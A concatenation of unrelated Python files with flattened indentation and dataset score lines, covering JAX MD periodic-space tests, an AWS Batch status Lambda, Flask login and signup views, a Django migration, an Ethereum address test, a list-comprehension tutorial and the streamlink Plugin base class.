E = jit(energy.soft_sphere_pair(d))
E_gf = jit(energy.soft_sphere_pair(d_gf))
E_g = jit(energy.soft_sphere_pair(d_g))
return R_f, R, box, (s, E), (s_gf, E_gf), (s_g, E_g)
# pylint: disable=invalid-name
class SpaceTest(jtu.JaxTestCase):
# pylint: disable=g-complex-comprehension
@parameterized.named_parameters(jtu.cases_from_list(
{
'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),
'spatial_dimension': dim,
'dtype': dtype
} for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE))
def test_transform(self, spatial_dimension, dtype):
key = random.PRNGKey(0)
for _ in range(STOCHASTIC_SAMPLES):
key, split1, split2 = random.split(key, 3)
R = random.normal(
split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)
T = random.normal(
split2, (spatial_dimension, spatial_dimension), dtype=dtype)
R_prime_exact = jnp.array(jnp.einsum('ij,kj->ki', T, R), dtype=dtype)
R_prime = space.transform(T, R)
self.assertAllClose(R_prime_exact, R_prime)
@parameterized.named_parameters(jtu.cases_from_list(
{
'testcase_name': '_dim={}'.format(dim),
'spatial_dimension': dim
} for dim in SPATIAL_DIMENSION))
def test_transform_grad(self, spatial_dimension):
key = random.PRNGKey(0)
for _ in range(STOCHASTIC_SAMPLES):
key, split1, split2 = random.split(key, 3)
R = random.normal(split1, (PARTICLE_COUNT, spatial_dimension))
T = random.normal(split2, (spatial_dimension, spatial_dimension))
R_prime = space.transform(T, R)
energy_direct = lambda R: jnp.sum(R ** 2)
energy_indirect = lambda T, R: jnp.sum(space.transform(T, R) ** 2)
grad_direct = grad(energy_direct)(R_prime)
grad_indirect = grad(energy_indirect, 1)(T, R)
self.assertAllClose(grad_direct, grad_indirect)
@parameterized.named_parameters(jtu.cases_from_list(
{
'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),
'spatial_dimension': dim,
'dtype': dtype
} for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE))
def test_transform_inverse(self, spatial_dimension, dtype):
key = random.PRNGKey(0)
tol = 1e-13
if dtype is f32:
tol = 1e-5
for _ in range(STOCHASTIC_SAMPLES):
key, split1, split2 = random.split(key, 3)
R = random.normal(
split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)
T = random.normal(
split2, (spatial_dimension, spatial_dimension), dtype=dtype)
T_inv = space.inverse(T)
R_test = space.transform(T_inv, space.transform(T, R))
self.assertAllClose(R, R_test)
@parameterized.named_parameters(jtu.cases_from_list(
{
'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),
'spatial_dimension': dim,
'dtype': dtype
} for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE))
def test_canonicalize_displacement_or_metric(self, spatial_dimension, dtype):
key = random.PRNGKey(0)
displacement, _ = space.periodic_general(jnp.eye(spatial_dimension))
metric = space.metric(displacement)
test_metric = space.canonicalize_displacement_or_metric(displacement)
metric = space.map_product(metric)
test_metric = space.map_product(test_metric)
for _ in range(STOCHASTIC_SAMPLES):
key, split1, split2 = random.split(key, 3)
R = random.normal(
split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)
self.assertAllClose(metric(R, R), test_metric(R, R))
@parameterized.named_parameters(jtu.cases_from_list(
{
'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),
'spatial_dimension': dim,
'dtype': dtype
} for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE))
def test_periodic_displacement(self, spatial_dimension, dtype):
key = random.PRNGKey(0)
for _ in range(STOCHASTIC_SAMPLES):
key, split = random.split(key)
R = random.uniform(
split, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)
dR = space.map_product(space.pairwise_displacement)(R, R)
dR_wrapped = space.periodic_displacement(f32(1.0), dR)
dR_direct = dR
dr_direct = space.distance(dR)
dr_direct = jnp.reshape(dr_direct, dr_direct.shape + (1,))
if spatial_dimension == 2:
for i in range(-1, 2):
for j in range(-1, 2):
dR_shifted = dR + jnp.array([i, j], dtype=R.dtype)
dr_shifted = space.distance(dR_shifted)
dr_shifted = jnp.reshape(dr_shifted, dr_shifted.shape + (1,))
dR_direct = jnp.where(dr_shifted < dr_direct, dR_shifted, dR_direct)
dr_direct = jnp.where(dr_shifted < dr_direct, dr_shifted, dr_direct)
elif spatial_dimension == 3:
for i in range(-1, 2):
for j in range(-1, 2):
for k in range(-1, 2):
dR_shifted = dR + jnp.array([i, j, k], dtype=R.dtype)
dr_shifted = space.distance(dR_shifted)
dr_shifted = jnp.reshape(dr_shifted, dr_shifted.shape + (1,))
dR_direct = jnp.where(
dr_shifted < dr_direct, dR_shifted, dR_direct)
dr_direct = jnp.where(
dr_shifted < dr_direct, dr_shifted, dr_direct)
dR_direct = jnp.array(dR_direct, dtype=dR.dtype)
assert dR_wrapped.dtype == dtype
self.assertAllClose(dR_wrapped, dR_direct)
@parameterized.named_parameters(jtu.cases_from_list(
{
'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),
'spatial_dimension': dim,
'dtype': dtype
} for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE))
def test_periodic_shift(self, spatial_dimension, dtype):
key = random.PRNGKey(0)
for _ in range(STOCHASTIC_SAMPLES):
key, split1, split2 = random.split(key, 3)
R = random.uniform(
split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)
dR = jnp.sqrt(f32(0.1)) * random.normal(
split2, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)
dR = jnp.where(dR > 0.49, f32(0.49), dR)
dR = jnp.where(dR < -0.49, f32(-0.49), dR)
R_shift = space.periodic_shift(f32(1.0), R, dR)
assert R_shift.dtype == R.dtype
assert jnp.all(R_shift < 1.0)
assert jnp.all(R_shift > 0.0)
dR_after = space.periodic_displacement(f32(1.0), R_shift - R)
assert dR_after.dtype == R.dtype
self.assertAllClose(dR_after, dR)
@parameterized.named_parameters(jtu.cases_from_list(
{
'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),
'spatial_dimension': dim,
'dtype': dtype
} for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE))
def test_periodic_against_periodic_general(self, spatial_dimension, dtype):
key = random.PRNGKey(0)
tol = 1e-13
if dtype is f32:
tol = 1e-5
for _ in range(STOCHASTIC_SAMPLES):
key, split1, split2, split3 = random.split(key, 4)
max_box_size = f32(10.0)
box_size = max_box_size * random.uniform(
split1, (spatial_dimension,), dtype=dtype)
transform = jnp.diag(box_size)
R = random.uniform(
split2, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)
R_scaled = R * box_size
dR = random.normal(
split3, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)
disp_fn, shift_fn = space.periodic(box_size)
general_disp_fn, general_shift_fn = space.periodic_general(transform)
disp_fn = space.map_product(disp_fn)
general_disp_fn = space.map_product(general_disp_fn)
self.assertAllClose(disp_fn(R_scaled, R_scaled), general_disp_fn(R, R))
assert disp_fn(R_scaled, R_scaled).dtype == dtype
self.assertAllClose(
shift_fn(R_scaled, dR), general_shift_fn(R, dR) * box_size)
assert shift_fn(R_scaled, dR).dtype == dtype
@parameterized.named_parameters(jtu.cases_from_list(
{
'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),
'spatial_dimension': dim,
'dtype': dtype
} for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE))
def test_periodic_against_periodic_general_grad(self, spatial_dimension, dtype):
key = random.PRNGKey(0)
tol = 1e-13
if dtype is f32:
tol = 1e-5
for _ in range(STOCHASTIC_SAMPLES):
key, split1, split2, split3 = random.split(key, 4)
max_box_size = f32(10.0)
box_size = max_box_size * random.uniform(
split1, (spatial_dimension,), dtype=dtype)
transform = jnp.diag(box_size)
R = random.uniform(
split2, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)
R_scaled = R * box_size
dR = random.normal(
split3, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)
disp_fn, shift_fn = space.periodic(box_size)
general_disp_fn, general_shift_fn = space.periodic_general(transform)
disp_fn = space.map_product(disp_fn)
general_disp_fn = space.map_product(general_disp_fn)
grad_fn = grad(lambda R: jnp.sum(disp_fn(R, R) ** 2))
general_grad_fn = grad(lambda R: jnp.sum(general_disp_fn(R, R) ** 2))
self.assertAllClose(grad_fn(R_scaled), general_grad_fn(R))
assert general_grad_fn(R).dtype == dtype
@parameterized.named_parameters(jtu.cases_from_list(
{
'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),
'spatial_dimension': dim,
'dtype': dtype,
} for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE))
def test_periodic_general_dynamic(self, spatial_dimension, dtype):
key = random.PRNGKey(0)
eye = jnp.eye(spatial_dimension)
for _ in range(STOCHASTIC_SAMPLES):
key, split_T0_scale, split_T0_dT = random.split(key, 3)
key, split_T1_scale, split_T1_dT = random.split(key, 3)
key, split_t, split_R, split_dR = random.split(key, 4)
size_0 = 10.0 * random.uniform(split_T0_scale, ())
dtransform_0 = 0.5 * random.normal(
split_T0_dT, (spatial_dimension, spatial_dimension))
T_0 = jnp.array(size_0 * (eye + dtransform_0), dtype=dtype)
size_1 = 10.0 * random.uniform(split_T1_scale, (), dtype=dtype)
dtransform_1 = 0.5 * random.normal(
split_T1_dT, (spatial_dimension, spatial_dimension), dtype=dtype)
T_1 = jnp.array(size_1 * (eye + dtransform_1), dtype=dtype)
disp_fn, shift_fn = space.periodic_general(T_0)
true_disp_fn, true_shift_fn = space.periodic_general(T_1)
disp_fn = partial(disp_fn, box=T_1)
disp_fn = space.map_product(disp_fn)
true_disp_fn = space.map_product(true_disp_fn)
R = random.uniform(
split_R, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)
dR = random.normal(
split_dR, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)
self.assertAllClose(
disp_fn(R, R), jnp.array(true_disp_fn(R, R), dtype=dtype))
self.assertAllClose(
shift_fn(R, dR, box=T_1), jnp.array(true_shift_fn(R, dR), dtype=dtype))
@parameterized.named_parameters(jtu.cases_from_list(
{
'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),
'spatial_dimension': dim,
'dtype': dtype,
} for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE))
def test_periodic_general_wrapped_vs_unwrapped(
self, spatial_dimension, dtype):
key = random.PRNGKey(0)
eye = jnp.eye(spatial_dimension, dtype=dtype)
tol = 1e-13
if dtype is f32:
tol = 2e-5
for _ in range(STOCHASTIC_SAMPLES):
key, split_R, split_T = random.split(key, 3)
dT = random.normal(
split_T, (spatial_dimension, spatial_dimension), dtype=dtype)
T = eye + dT + jnp.transpose(dT)
R = random.uniform(
split_R, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)
R0 = R
unwrapped_R = R
displacement, shift = space.periodic_general(T)
_, unwrapped_shift = space.periodic_general(T, wrapped=False)
displacement = space.map_product(displacement)
for _ in range(SHIFT_STEPS):
key, split = random.split(key)
dR = random.normal(
split, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)
R = shift(R, dR)
unwrapped_R = unwrapped_shift(unwrapped_R, dR)
self.assertAllClose(
displacement(R, R0),
displacement(unwrapped_R, R0))
assert not (jnp.all(unwrapped_R > 0) and jnp.all(unwrapped_R < 1))
@parameterized.named_parameters(jtu.cases_from_list(
{
'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}',
'spatial_dimension': dim,
'dtype': dtype,
'box_format': box_format
} for dim in SPATIAL_DIMENSION
for dtype in POSITION_DTYPE
for box_format in BOX_FORMATS))
def test_periodic_general_energy(self, spatial_dimension, dtype, box_format):
N = 16
R_f, R, box, (s, E), (s_gf, E_gf), (s_g, E_g) = \
make_periodic_general_test_system(N, spatial_dimension, dtype, box_format)
self.assertAllClose(E(R), E_gf(R_f))
self.assertAllClose(E(R), E_g(R))
@parameterized.named_parameters(jtu.cases_from_list(
{
'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}',
'spatial_dimension': dim,
'dtype': dtype,
'box_format': box_format
} for dim in SPATIAL_DIMENSION
for dtype in POSITION_DTYPE
for box_format in BOX_FORMATS))
def test_periodic_general_force(self, spatial_dimension, dtype, box_format):
N = 16
R_f, R, box, (s, E), (s_gf, E_gf), (s_g, E_g) = \
make_periodic_general_test_system(N, spatial_dimension, dtype, box_format)
self.assertAllClose(grad(E)(R), grad(E_gf)(R_f))
self.assertAllClose(grad(E)(R), grad(E_g)(R))
@parameterized.named_parameters(jtu.cases_from_list(
{
'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}',
'spatial_dimension': dim,
'dtype': dtype,
'box_format': box_format
} for dim in SPATIAL_DIMENSION
for dtype in POSITION_DTYPE
for box_format in BOX_FORMATS))
def test_periodic_general_shift(self, spatial_dimension, dtype, box_format):
N = 16
R_f, R, box, (s, E), (s_gf, E_gf), (s_g, E_g) = \
make_periodic_general_test_system(N, spatial_dimension, dtype, box_format)
R_new = s(R, grad(E)(R))
R_gf_new = s_gf(R_f, grad(E_gf)(R_f))
R_g_new = s_g(R, grad(E_g)(R))
self.assertAllClose(R_new, space.transform(box, R_gf_new))
self.assertAllClose(R_new, R_g_new)
@parameterized.named_parameters(jtu.cases_from_list(
{
'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}',
'spatial_dimension': dim,
'dtype': dtype,
'box_format': box_format
} for dim in SPATIAL_DIMENSION
for dtype in POSITION_DTYPE
for box_format in BOX_FORMATS))
def test_periodic_general_deform(self, spatial_dimension, dtype, box_format):
N = 16
R_f, R, box, (s, E), (s_gf, E_gf), (s_g, E_g) = \
make_periodic_general_test_system(N, spatial_dimension, dtype, box_format)
deformed_box = box * 0.9
self.assertAllClose(E_gf(R_f, box=deformed_box),
E_g(R, new_box=deformed_box))
@parameterized.named_parameters(jtu.cases_from_list(
{
'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}',
'spatial_dimension': dim,
'dtype': dtype,
'box_format': box_format
} for dim in SPATIAL_DIMENSION
for dtype in POSITION_DTYPE
for box_format in BOX_FORMATS))
def test_periodic_general_deform_grad(self,
spatial_dimension, dtype, box_format):
N = 16
R_f, R, box, (s, E), (s_gf, E_gf), (s_g, E_g) = \
make_periodic_general_test_system(N, spatial_dimension, dtype, box_format)
deformed_box = box * 0.9
self.assertAllClose(grad(E_gf)(R_f, box=deformed_box),
grad(E_g)(R, new_box=deformed_box))
self.assertAllClose(jacfwd(E_gf)(R_f, box=deformed_box),
jacfwd(E_g)(R, new_box=deformed_box))
@parameterized.named_parameters(jtu.cases_from_list(
{
'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}',
'spatial_dimension': dim,
'dtype': dtype,
'box_format': box_format
} for dim in SPATIAL_DIMENSION
for dtype in POSITION_DTYPE
for box_format in BOX_FORMATS))
def test_periodic_general_deform_shift(self,
spatial_dimension, dtype, box_format):
N = 16
R_f, R, box, (s, E), (s_gf, E_gf), (s_g, E_g) = \
make_periodic_general_test_system(N, spatial_dimension, dtype, box_format)
deformed_box = box * 0.9
R_new = s_g(R, grad(E_g)(R), new_box=deformed_box)
R_gf_new = space.transform(deformed_box, s_gf(R_f, grad(E_gf)(R_f)))
self.assertAllClose(R_new, R_gf_new)
@parameterized.named_parameters(jtu.cases_from_list(
{
'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}',
'spatial_dimension': dim,
'dtype': dtype,
'box_format': box_format
} for dim in SPATIAL_DIMENSION
for dtype in POSITION_DTYPE
for box_format in BOX_FORMATS))
def test_periodic_general_grad_box(self, spatial_dimension, dtype, box_format):
if box_format == 'scalar':
raise SkipTest('Scalar case fails due to JAX Issue #5849.')
N = 16
R_f, R, box, (s, E), (s_gf, E_gf), (s_g, E_g) = \
make_periodic_general_test_system(N, spatial_dimension, dtype, box_format)
@grad
def box_energy_g_fn(box):
return E_g(R, new_box=box)
@grad
def box_energy_gf_fn(box):
return E_gf(R_f, box=box)
self.assertAllClose(box_energy_g_fn(box), box_energy_gf_fn(box))
if __name__ == '__main__':
absltest.main()
| 1.898438 | 2 |
functions/batch-custom-action/status-api/lambda.py | TrollPursePublishing/trollpurse-trollops | 2 | 1268 | <filename>functions/batch-custom-action/status-api/lambda.py
import boto3
batch_client = boto3.client('batch')
def lambda_handler(event, context):
describe_response = batch_client.describe_jobs(
jobs=[ event.get('jobId', '')]
)
return describe_response.get('jobs', [{}])[0].get('status', '')
| 2.09375 | 2 |
app/auth/views.py | ifaraag/app | 0 | 1269 | <reponame>ifaraag/app<filename>app/auth/views.py<gh_stars>0
from flask import Blueprint, render_template, redirect, url_for, request, flash
from flask.ext.login import login_required, login_user, logout_user
from werkzeug import check_password_hash, generate_password_hash
from app import db, login_manager, pubnub, app, _callback
from .models import User
from .forms import LoginForm, SignupForm
mod_auth = Blueprint('auth', __name__)
@mod_auth.route('/login', methods=['GET', 'POST'])
def login():
form = LoginForm(request.form)
error = None
print(request.method)
if request.method == 'POST':
user = db.users.find_one({'username': request.form['username']})
if not user:
error = 'User does not exist'
elif not check_password_hash(user['password'], request.form['password']):
error = 'Invalid credentials. Please try again.'
else:
user_obj = User(user['username'])
login_user(user_obj)
return redirect(url_for('devices.list_devices'))
return render_template('auth/login.html',
title='Log In to Hydrosmart',
form=form,
error=error)
@mod_auth.route('/signup', methods=['GET', 'POST'])
def signup():
form = SignupForm(request.form)
error = None
if request.method == 'POST':
existing_user = db.users.find_one({'username' :
request.form['username']})
if existing_user:
error = 'Username already exists'
else:
new_user = {'username' : request.form['username'],
'email' : request.form['email'],
'zip' : request.form['zip'],
'password' : generate_password_hash(request.form['password'])}
db.users.insert_one(new_user)
user = db.users.find_one({'username': request.form['username']})
pubnub.channel_group_add_channel(channel_group=app.config['PUBNUB_CHANNEL_GRP'], channel=user['username'])
pubnub.grant(channel=user['username'], auth_key=app.config['PUBNUB_AUTH_KEY'], read=True, write=True, manage=True, ttl=0)
return redirect(url_for('dashboard.dashboard'))
return render_template('auth/signup.html', form=form,
title='Sign Up for Hydrosmart', error=error)
# @mod_auth.route('/googlelogin', methods=['GET', 'POST'])
@mod_auth.route("/logout")
@login_required
def logout():
logout_user()
flash("Logged out.")
return redirect('/login')
@login_manager.unauthorized_handler
def unauthorized_callback():
return redirect('/login')
@login_manager.user_loader
def load_user(username):
u = db.users.find_one({'username': username})
if not u:
return None
return User(u['username'])
def callback(message, channel):
db.data.insert_one(message)
def error(message):
db.data.insert_one(message)
| 2.265625 | 2 |
economist/migrations/0003_auto_20170406_1402.py | xingjianpan/news_reader_backend | 1 | 1270 | <filename>economist/migrations/0003_auto_20170406_1402.py
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-04-06 06:02
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('economist', '0002_auto_20170406_1153'),
]
operations = [
migrations.AlterField(
model_name='article',
name='alternativename',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='article',
name='category',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='article',
name='fly_title',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='article',
name='headline',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='article',
name='project',
field=models.TextField(editable=False),
),
migrations.AlterField(
model_name='article',
name='source',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='article',
name='source_url',
field=models.URLField(editable=False),
),
migrations.AlterField(
model_name='article',
name='spider',
field=models.TextField(editable=False),
),
]
| 1.640625 | 2 |
test/test_ethereum.py | coinplus-sa/coinplus-solo | 1 | 1271 | import unittest
from coinplus_solo_redeem.common import wif_export_bitcoin, compute_public_key_sec256k1, address_from_publickey_ethereum
class TestEthereum(unittest.TestCase):
"""test of the bitcoin conversion from private key to wif"""
def setUp(self):
self.test_add_vector = [("03cb3e5f30245658e1e3615f1620e5b40f7d9016c0edb3611dd786327dd5e40caa", "<KEY>"),
("<KEY>", "0xDB1F8a8B668F15B9e696dDfF30Ce233703f9eC97"),
("<KEY>", "<KEY>"),
("<KEY>", "<KEY>"),
("037049004c5ad576beb518dcc74506df3faf520109a489886b7d1435a63b9b0b88", "0x0af4DbEf58063AEd75e6fF57610348E55954E8FB"),
("0260bbacc03555af21f062ff04e9fbde36bcf0ae7396812d336e7f2e5292306f2b", "<KEY>"),
("0343710601de0710dd81a0b7102bf1b794809a330caf4e1b4ae6567923c00df6a5", "<KEY>"),
("028c48ff458287f34cc1ad5c58a441500f8f315e9cabe34ff1601a5a0f791e4d0a", "0x98447B7aC721BDeb197a7e72780f6f41BECA2919"),
("0258cdabe1dad468dda6a7d62bee9e0cddadfe87d664e62df9143e769c017dd651", "0xaA5EacE5be0D09B09BAf66df62b0D85EA20b4ee4"),
("<KEY>", "<KEY>")]
def test_address_testvector(self):
for publickey_hex, address_expected in self.test_add_vector:
publickey = bytearray.fromhex(publickey_hex)
address = address_from_publickey_ethereum(publickey)
self.assertEqual(address, address_expected)
| 2.65625 | 3 |
python97/chapter05/list_gen.py | youaresherlock/PythonPractice | 0 | 1272 | #!usr/bin/python
# -*- coding:utf8 -*-
# 列表生成式(列表推导式)
# 1. 提取出1-20之间的奇数
# odd_list = []
# for i in range(21):
# if i % 2 == 1:
# odd_list.append(i)
# odd_list = [i for i in range(21) if i % 2 == 1]
# print(odd_list)
# 2. 逻辑复杂的情况 如果是奇数将结果平方
# 列表生成式性能高于列表操作
def handle_item(item):
return item * item
odd_list = [handle_item(i) for i in range(21) if i % 2 == 1]
print(odd_list)
# 生成器表达式
odd_gen = (i for i in range(21) if i % 2 == 1)
print(type(odd_gen))
for item in odd_gen:
print(item)
# 字典推导式
my_dict = {"bobby1": 22, "bobby2": 23, "imooc.com": 5}
reversed_dict = {value:key for key, value in my_dict.items()}
print(reversed_dict)
# 集合推导式
my_set = set(my_dict.keys())
my_set = {key for key, value in my_dict.items()}
print(type(my_set))
| 4.0625 | 4 |
src/streamlink/plugin/plugin.py | isqad/streamlink | 1 | 1273 | import ast
import operator
import re
from collections import OrderedDict
from functools import partial
from ..cache import Cache
from ..exceptions import PluginError, NoStreamsError
from ..options import Options
# FIXME: This is a crude attempt at making a bitrate's
# weight end up similar to the weight of a resolution.
# Someone who knows math, please fix.
BIT_RATE_WEIGHT_RATIO = 2.8
ALT_WEIGHT_MOD = 0.01
QUALITY_WEIGTHS_EXTRA = {
"other": {
"live": 1080,
},
"tv": {
"hd": 1080,
"sd": 576,
},
"quality": {
"ehq": 720,
"hq": 576,
"sq": 360,
},
}
FILTER_OPERATORS = {
"<": operator.lt,
"<=": operator.le,
">": operator.gt,
">=": operator.ge,
}
PARAMS_REGEX = r"(\w+)=({.+?}|\[.+?\]|\(.+?\)|'(?:[^'\\]|\\')*'|\"(?:[^\"\\]|\\\")*\"|\S+)"
HIGH_PRIORITY = 30
NORMAL_PRIORITY = 20
LOW_PRIORITY = 10
NO_PRIORITY = 0
def stream_weight(stream):
for group, weights in QUALITY_WEIGTHS_EXTRA.items():
if stream in weights:
return weights[stream], group
match = re.match(r"^(\d+)(k|p)?(\d+)?(\+)?(?:_(\d+)k)?(?:_(alt)(\d)?)?$", stream)
if match:
weight = 0
if match.group(6):
if match.group(7):
weight -= ALT_WEIGHT_MOD * int(match.group(7))
else:
weight -= ALT_WEIGHT_MOD
name_type = match.group(2)
if name_type == "k": # bit rate
bitrate = int(match.group(1))
weight += bitrate / BIT_RATE_WEIGHT_RATIO
return weight, "bitrate"
elif name_type == "p": # resolution
weight += int(match.group(1))
if match.group(3): # fps eg. 60p or 50p
weight += int(match.group(3))
if match.group(4) == "+":
weight += 1
if match.group(5): # bit rate classifier for resolution
weight += int(match.group(5)) / BIT_RATE_WEIGHT_RATIO
return weight, "pixels"
return 0, "none"
def iterate_streams(streams):
for name, stream in streams:
if isinstance(stream, list):
for sub_stream in stream:
yield (name, sub_stream)
else:
yield (name, stream)
def stream_type_priority(stream_types, stream):
stream_type = type(stream[1]).shortname()
try:
prio = stream_types.index(stream_type)
except ValueError:
try:
prio = stream_types.index("*")
except ValueError:
prio = 99
return prio
def stream_sorting_filter(expr, stream_weight):
match = re.match(r"(?P<op><=|>=|<|>)?(?P<value>[\w+]+)", expr)
if not match:
raise PluginError("Invalid filter expression: {0}".format(expr))
op, value = match.group("op", "value")
op = FILTER_OPERATORS.get(op, operator.eq)
filter_weight, filter_group = stream_weight(value)
def func(quality):
weight, group = stream_weight(quality)
if group == filter_group:
return not op(weight, filter_weight)
return True
return func
def parse_url_params(url):
split = url.split(" ", 1)
url = split[0]
params = split[1] if len(split) > 1 else ''
return url, parse_params(params)
def parse_params(params):
rval = {}
matches = re.findall(PARAMS_REGEX, params)
for key, value in matches:
try:
value = ast.literal_eval(value)
except Exception:
pass
rval[key] = value
return rval
class Plugin(object):
"""A plugin can retrieve stream information from the URL specified.
:param url: URL that the plugin will operate on
"""
cache = None
logger = None
module = "unknown"
options = Options()
session = None
@classmethod
def bind(cls, session, module):
cls.cache = Cache(filename="plugin-cache.json",
key_prefix=module)
cls.logger = session.logger.new_module("plugin." + module)
cls.module = module
cls.session = session
def __init__(self, url):
self.url = url
@classmethod
def can_handle_url(cls, url):
raise NotImplementedError
@classmethod
def set_option(cls, key, value):
cls.options.set(key, value)
@classmethod
def get_option(cls, key):
return cls.options.get(key)
@classmethod
def stream_weight(cls, stream):
return stream_weight(stream)
@classmethod
def default_stream_types(cls, streams):
stream_types = ["rtmp", "hls", "hds", "http"]
for name, stream in iterate_streams(streams):
stream_type = type(stream).shortname()
if stream_type not in stream_types:
stream_types.append(stream_type)
return stream_types
@classmethod
def broken(cls, issue=None):
def func(*args, **kwargs):
msg = (
"This plugin has been marked as broken. This is likely due to "
"changes to the service preventing a working implementation. "
)
if issue:
msg += "More info: https://github.com/streamlink/streamlink/issues/{0}".format(issue)
raise PluginError(msg)
def decorator(*args, **kwargs):
return func
return decorator
@classmethod
def priority(cls, url):
"""
Return the plugin priority for a given URL, by default it returns
NORMAL priority.
:return: priority level
"""
return NORMAL_PRIORITY
def streams(self, stream_types=None, sorting_excludes=None):
"""Attempts to extract available streams.
Returns a :class:`dict` containing the streams, where the key is
the name of the stream, most commonly the quality and the value
is a :class:`Stream` object.
The result can contain the synonyms **best** and **worst** which
points to the streams which are likely to be of highest and
lowest quality respectively.
If multiple streams with the same name are found, the order of
streams specified in *stream_types* will determine which stream
gets to keep the name while the rest will be renamed to
"<name>_<stream type>".
The synonyms can be fine tuned with the *sorting_excludes*
parameter. This can be either of these types:
- A list of filter expressions in the format
*[operator]<value>*. For example the filter ">480p" will
exclude streams ranked higher than "480p" from the list
used in the synonyms ranking. Valid operators are >, >=, <
and <=. If no operator is specified then equality will be
tested.
- A function that is passed to filter() with a list of
stream names as input.
:param stream_types: A list of stream types to return.
:param sorting_excludes: Specify which streams to exclude from
the best/worst synonyms.
.. versionchanged:: 1.4.2
Added *priority* parameter.
.. versionchanged:: 1.5.0
Renamed *priority* to *stream_types* and changed behaviour
slightly.
.. versionchanged:: 1.5.0
Added *sorting_excludes* parameter.
.. versionchanged:: 1.6.0
*sorting_excludes* can now be a list of filter expressions
or a function that is passed to filter().
"""
try:
ostreams = self._get_streams()
if isinstance(ostreams, dict):
ostreams = ostreams.items()
# Flatten the iterator to a list so we can reuse it.
if ostreams:
ostreams = list(ostreams)
except NoStreamsError:
return {}
except (IOError, OSError, ValueError) as err:
raise PluginError(err)
if not ostreams:
return {}
if stream_types is None:
stream_types = self.default_stream_types(ostreams)
# Add streams depending on stream type and priorities
sorted_streams = sorted(iterate_streams(ostreams),
key=partial(stream_type_priority,
stream_types))
streams = {}
for name, stream in sorted_streams:
stream_type = type(stream).shortname()
# Use * as wildcard to match other stream types
if "*" not in stream_types and stream_type not in stream_types:
continue
# drop _alt from any stream names
if name.endswith("_alt"):
name = name[:-len("_alt")]
existing = streams.get(name)
if existing:
existing_stream_type = type(existing).shortname()
if existing_stream_type != stream_type:
name = "{0}_{1}".format(name, stream_type)
if name in streams:
name = "{0}_alt".format(name)
num_alts = len(list(filter(lambda n: n.startswith(name), streams.keys())))
# We shouldn't need more than 2 alt streams
if num_alts >= 2:
continue
elif num_alts > 0:
name = "{0}{1}".format(name, num_alts + 1)
# Validate stream name and discard the stream if it's bad.
match = re.match("([A-z0-9_+]+)", name)
if match:
name = match.group(1)
else:
self.logger.debug("The stream '{0}' has been ignored "
"since it is badly named.", name)
continue
# Force lowercase name and replace space with underscore.
streams[name.lower()] = stream
# Create the best/worst synonmys
def stream_weight_only(s):
return (self.stream_weight(s)[0] or
(len(streams) == 1 and 1))
stream_names = filter(stream_weight_only, streams.keys())
sorted_streams = sorted(stream_names, key=stream_weight_only)
if isinstance(sorting_excludes, list):
for expr in sorting_excludes:
filter_func = stream_sorting_filter(expr, self.stream_weight)
sorted_streams = list(filter(filter_func, sorted_streams))
elif callable(sorting_excludes):
sorted_streams = list(filter(sorting_excludes, sorted_streams))
final_sorted_streams = OrderedDict()
for stream_name in sorted(streams, key=stream_weight_only):
final_sorted_streams[stream_name] = streams[stream_name]
if len(sorted_streams) > 0:
best = sorted_streams[-1]
worst = sorted_streams[0]
final_sorted_streams["worst"] = streams[worst]
final_sorted_streams["best"] = streams[best]
return final_sorted_streams
def get_streams(self, *args, **kwargs):
"""Deprecated since version 1.9.0.
Has been renamed to :func:`Plugin.streams`, this is an alias
for backwards compatibility.
"""
return self.streams(*args, **kwargs)
def _get_streams(self):
raise NotImplementedError
__all__ = ["Plugin"]
| 2.40625 | 2 |
tests/cli/conftest.py | Aahbree/reference-data-repository | 0 | 1274 | # This file is part of the Reference Data Repository (refdata).
#
# Copyright (C) 2021 New York University.
#
